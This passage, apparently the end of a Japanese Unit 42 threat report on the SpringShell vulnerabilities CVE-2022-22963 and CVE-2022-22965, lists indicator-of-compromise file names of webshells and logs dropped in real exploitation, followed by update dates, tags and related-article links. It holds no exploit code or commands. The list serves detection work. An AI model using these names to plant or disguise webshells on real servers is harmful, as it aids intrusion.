[SpringShellおよび最近のSpringの脆弱性CVE-2022-22963、CVE-2022-22965に対するPrisma Cloudによる緩和策](https://www.paloaltonetworks.com/blog/prisma-cloud/recent-spring-vulnerabilities/?lang=ja)  
[How Cortex XDR Blocks SpringShell Exploits (Cortex XDRはどのようにSpringShellのエクスプロイトをブロックしているか)](https://www.paloaltonetworks.com/blog/security-operations/cortex-xdr-springshell/)

## IoC

### Webシェル/logファイル名

0808a56a90ca2f8b1e91a1e60b7b451e.txt  
0c901fefcae46ba984225aa72df0825c.txt  
1532b681733b6bce2ff7252d8890d550.txt  
28fcea06661f13ebe9c87327f949f3a8.txt  
2b98432e352ff74569b81099dd5ee246.txt  
4acbedbe977480d19b7b682d4878cae2.txt  
4fdd6fbd220e26b63a7c9a5aa88f5f31.txt  
5657e4634210a3d47a789d1389a89320.txt  
646bbc2c112070c26b3c042e81c6947e.txt  
70b98d30e383df910ce3d693603404fb.txt  
73be7d1ef52c3dbc9a5d726288d8a4ba.txt  
83d81ef47f0e9a205fb66a100f3179bf.txt  
8592f3e430720d324d7cfd7ecd1de521.txt  
8697f146477832389449cf2548032ca7.txt  
Shell.jsp  
UJaez.jsp  
Y4kws.jsp  
a6bfc76094f689dab978f059ea2456a1.txt  
aniwvzgvwqnwtehgsfsgbslwoiqkjk.jsp  
appli12  
baf24e5f9fc18cf58172d1ba745f0f7a.txt  
c41fc8f359d1658559c2d1c0043c76fb.txt  
cbsewlaeqsdsqktavziakyzsuwfciu.jsp  
czbwzitpzjzkcvkrirybzihsibmuej.jsp  
czpdnhpraxgzrtatiuigsalfedwwit.jsp  
dnuurzjtlbjrnuukwdmaltqrqqlaig.jsp  
duvdqpoyrcapqbfcetgwsqxfkslubw.jsp  
ee947d98b91c8ada08f8c15e8f3248fc.txt  
efdde87c66fe4e6dc73a2ab6111ca58a.txt  
facb4be5385617bf11e6d67f0aa0203b.txt  
ggoibjvztvlpelaghjzeweqmopjosz.jsp  
goocmasqxwfufyxrgyachwidxdotkh.jsp  
hlbpgpqsyracfnvkgrgvlhcptpmdfn.jsp  
hmmyitbecwhmrdicykmfvqlcsknbff.jsp  
hnmqeuzumlokxuhqyekeetrgougeof.jsp  
ilvckpgzbrcdljyqdfhqendqcwhgxp.jsp  
izodfyvqujwztweclykgozahdlqvqp.jsp  
jynrrkjghebemkrhvfzllrepzosinb.jsp  
kqbnngrfnsxlreajyknuimoamysvwt.jsp  
ltcovlwqkckjpuzbqzbjdpkgkakvno.jsp  
mhoqqvpuxdqtuqzmwdrvdeayqvlygb.jsp  
osanxuadyvjaiorcjfqnckfpewunnt.jsp  
ptipfhjosfvrfwndwqccapozcbasge.jsp  
pxwcqxzrstepmbwufjxuaydkwgmvds.jsp  
qnzfvqpeiljtoyvrywrkuvkrmuewzn.jsp  
rQFlA.jsp  
rmdwahilztwhhqnmcbodkgtbnmrhjx.jsp  
tomcat74935.jsp  
ubekdurthzexowlohzgienbwvexynd.jsp  
ufoubgkazumxhqvwlnyfejnmyqofcm.jsp  
ujpmauuhltvsokjracgwkbflkhhnwo.jsp  
vkmckfvljtpbyowxwhgbjsvyktfdiq.jsp  
xcoihpiouaamtnbqqvcvffyxyrokvn.jsp  
yjjhhdlxepozhirznemjabnsciycvv.jsp  
yutugdqbrossntwaujgxwgrpgczkbd.jsp  
zawpiupzzsjexllfbicrgvlcuxzqyb.jsp  
zqgwtzyrexctiyvsawmwttncwzoyyd.jsp  
zuvuegtemzfsyqjfykowggxpqkuqdp.jsp  
0xd0m7.jsp  
crashed\_log\_  
gdGCT.jsp  
myshell.jsp  
rakesh.jsp  
shei1.jsp  
shell13.jsp  
tomcatlogin.jsp  
data\_theorem\_spring4shell\_scan.txt  
jarom\_h1.jsp  
jquery123123123cssbackup7331.jsp  
tomjj.jsp  
test1.jsp  
hackerone0x.jsp  
inject.jsp  
poc4bugb.jsp  
curiositysec.jsp  
mynameis0bsecure.jsp  
tomcatwa.jsp  
ahmed.txt  
testqqsg.jsp  
wpz.jsp  
lelel.jsp  
shell.jsp  
07935fdf05b66.jsp  
vulntest-12345.txt  
jquerycssv2.js  
poc.jsp  
tomcatspring.jsp  
ofc.jsp  
lalalalal.jsp  
safetytest.txt  
log.txt  
safetytest  
javatestfila.jsp  
checkexploit.jsp  
tomcatwar.jsp

*2022-04-04 09:00 JST 英語版更新日 2022-04-01 07:30 PDT の内容を反映
2022-04-05 09:00 JST 英語版更新日 2022-04-04 08:00 PDT の内容を反映
2022-04-06 09:00 JST 英語版更新日 2022-04-05 15:30 PDT の内容を反映
2022-04-11 13:00 JST 英語版更新日 2022-04-08 17:00 PDT の内容を反映
2022-04-14 09:00 JST 英語版更新日 2022-04-13 08:00 PDT の内容を反映
2022-04-23 15:15 JST 英語版更新日 2022-04-19 07:30 PDT の内容を反映*
トップに戻る

### タグ

* [CVE-2022-22963](https://unit42.paloaltonetworks.com/ja/tag/cve-2022-22963-ja/ "CVE-2022-22963")
* [CVE-2022-22965](https://unit42.paloaltonetworks.com/ja/tag/cve-2022-22965-ja/ "CVE-2022-22965")
* [Exploit in the wild](https://unit42.paloaltonetworks.com/ja/tag/exploit-in-the-wild-ja/ "exploit in the wild")
* [Remote Code Execution](https://unit42.paloaltonetworks.com/ja/tag/remote-code-execution-ja/ "Remote Code Execution")
* [SpringShell](https://unit42.paloaltonetworks.com/ja/tag/springshell-ja/ "SpringShell")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:脅威に関する情報: Lapsus$グループ](https://unit42.paloaltonetworks.com/ja/lapsus-group/ "脅威に関する情報: Lapsus$グループ")

### 目次

* 

### 関連記事

* [BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "article - table of contents")
* [野放し状態で悪用されているIvanti EPMMの深刻な脆弱性](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/ "article - table of contents")
* [React Server Components における重大な脆弱性の悪用 (12月12日更新)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/ "article - table of contents")

## 関連項目 脆弱性 リソース

![Pictorial representation of a severe Linux vulnerability. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Vulnerabilities_1920x900-2-1-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年5月5日 [#### Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/)

* [Containers](https://unit42.paloaltonetworks.com/ja/tag/containers-ja/ "Containers")

* [CVE-2026-31431](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-31431/ "CVE-2026-31431")

* [Kubernetes](https://unit42.paloaltonetworks.com/ja/tag/kubernetes-ja/ "Kubernetes")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/ "Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識")  
  ![Pictorial representation of BeyondTrust vulnerability CVE-2026-1731. Digital art depicting a stylized mountain range with vibrant blue and red hues. The peaks are accentuated by glowing particles and an abstract, starry backdrop, creating a futuristic landscape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/14_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月19日 [#### BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/)

* [Bash](https://unit42.paloaltonetworks.com/ja/tag/bash-ja/ "bash")

* [CVE-2026-1731](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1731/ "CVE-2026-1731")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認")  
  ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/AdobeStock_1020436911-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月17日 [#### 野放し状態で悪用されているIvanti EPMMの深刻な脆弱性](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/)

* [CVE-2026-1281](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1281/ "CVE-2026-1281")

* [CVE-2026-1340](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1340/ "CVE-2026-1340")

* [Ivanti](https://unit42.paloaltonetworks.com/ja/tag/ivanti-ja/ "Ivanti")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/ "野放し状態で悪用されているIvanti EPMMの深刻な脆弱性")  
  ![Pictorial representation of CVE-2025-0921. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/06_Vulnerabilities_1920x900-2-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月30日 [#### SCADAシステムに存在する特権ファイルシステムの脆弱性](https://unit42.paloaltonetworks.com/ja/iconics-suite-cve-2025-0921/)

* [CVE-2025-0921](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-0921/ "CVE-2025-0921")

* [Privilege escalation](https://unit42.paloaltonetworks.com/ja/tag/privilege-escalation-ja/ "privilege escalation")

* [SCADA](https://unit42.paloaltonetworks.com/ja/tag/scada/ "SCADA")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iconics-suite-cve-2025-0921/ "SCADAシステムに存在する特権ファイルシステムの脆弱性")  
  ![Pictorial representation of remote code execution in AI and machine learning libraries. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/05_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月13日 [#### 最新のAI/MLフォーマットとライブラリによるリモート コード実行](https://unit42.paloaltonetworks.com/ja/rce-vulnerabilities-in-ai-python-libraries/)

* [Apple](https://unit42.paloaltonetworks.com/ja/tag/apple-ja/ "Apple")

* [CVE-2025-23304](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-23304/ "CVE-2025-23304")

* [CVE-2026-22584](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-22584/ "CVE-2026-22584")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/rce-vulnerabilities-in-ai-python-libraries/ "最新のAI/MLフォーマットとライブラリによるリモート コード実行")  
  ![Pictorial representation of MongoBleed, CVE-2025-14847. Digital image featuring a glowing padlock icon superimposed on a background of streaming blue binary code, symbolizing cybersecurity.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/AdobeStock_233494953-786x429.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年1月13日 [#### 脅威ブリーフ: MongoDB の脆弱性 (CVE-2025-14847)](https://unit42.paloaltonetworks.com/ja/mongobleed-cve-2025-14847/)

* [CVE-2025-14847](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-14847/ "CVE-2025-14847")

* [MongoDB](https://unit42.paloaltonetworks.com/ja/tag/mongodb-ja/ "MongoDB")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/mongobleed-cve-2025-14847/ "脅威ブリーフ: MongoDB の脆弱性 (CVE-2025-14847)")  
  ![Pictorial representation of CVE-2025-55182 (React) and CVE-2025-66478 (Next.js). Close-up of a digital display on electronic equipment with illuminated text reading "SYSTEM HACKED" in red, set against a blurred background of blue and red lights.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/02_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2025年12月12日 [#### React Server Components における重大な脆弱性の悪用 (12月12日更新)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/)

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [CVE-2025-66478](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-66478-ja/ "CVE-2025-66478")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/ "React Server Components における重大な脆弱性の悪用 (12月12日更新)")  
  ![Pictorial representation of an authentication coercion attack. Panoramic view of a city skyline at night, featuring vibrant light beams from skyscrapers and a deep blue sky.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/07_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年11月10日 [#### 新たなアップデート。進化し続ける強制認証テクニック](https://unit42.paloaltonetworks.com/ja/authentication-coercion/)

* [Mimikatz](https://unit42.paloaltonetworks.com/ja/tag/mimikatz-ja/ "Mimikatz")

* [PrintNightmare](https://unit42.paloaltonetworks.com/ja/tag/printnightmare-ja/ "PrintNightmare")

* [Privilege escalation](https://unit42.paloaltonetworks.com/ja/tag/privilege-escalation-ja/ "privilege escalation")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/authentication-coercion/ "新たなアップデート。進化し続ける強制認証テクニック")  
  ![Pictorial representation of LANDFALL spyware. An illustration of a glowing red warning icon centered on a detailed blue circuit board background, representing a vulnerability in Samsung Galaxy devices.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/09_Nation-State-cyberattacks_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年11月7日 [#### LANDFALL: Samsungデバイスを標的とするエクスプロイト チェーンで使用される、新種の商用グレードAndroidスパイウェア](https://unit42.paloaltonetworks.com/ja/landfall-is-new-commercial-grade-android-spyware/)

* [Android](https://unit42.paloaltonetworks.com/ja/tag/android-ja/ "Android")

* [Apple](https://unit42.paloaltonetworks.com/ja/tag/apple-ja/ "Apple")

* [CVE-2025-21042](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-21042-ja/ "CVE-2025-21042")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/landfall-is-new-commercial-grade-android-spyware/ "LANDFALL: Samsungデバイスを標的とするエクスプロイト チェーンで使用される、新種の商用グレードAndroidスパイウェア")  
  ![Pictorial representation of CVE-2025-59287. Digital image of a glowing padlock symbol representing cybersecurity on a network grid with blue and orange lights.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/10/08_DNS_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2025年11月3日 [#### Microsoft WSUSのリモートコード実行の脆弱性（CVE-2025-59287）、実環境における活発な悪用を確認（11月3日更新）](https://unit42.paloaltonetworks.com/ja/microsoft-cve-2025-59287/)

* [CVE-2025-59287](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-59287-ja/ "CVE-2025-59287")

* [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/ "Microsoft")

* [Microsoft Vulnerability](https://unit42.paloaltonetworks.com/ja/tag/microsoft-vulnerability-ja/ "Microsoft Vulnerability")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/microsoft-cve-2025-59287/ "Microsoft WSUSのリモートコード実行の脆弱性（CVE-2025-59287）、実環境における活発な悪用を確認（11月3日更新）")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
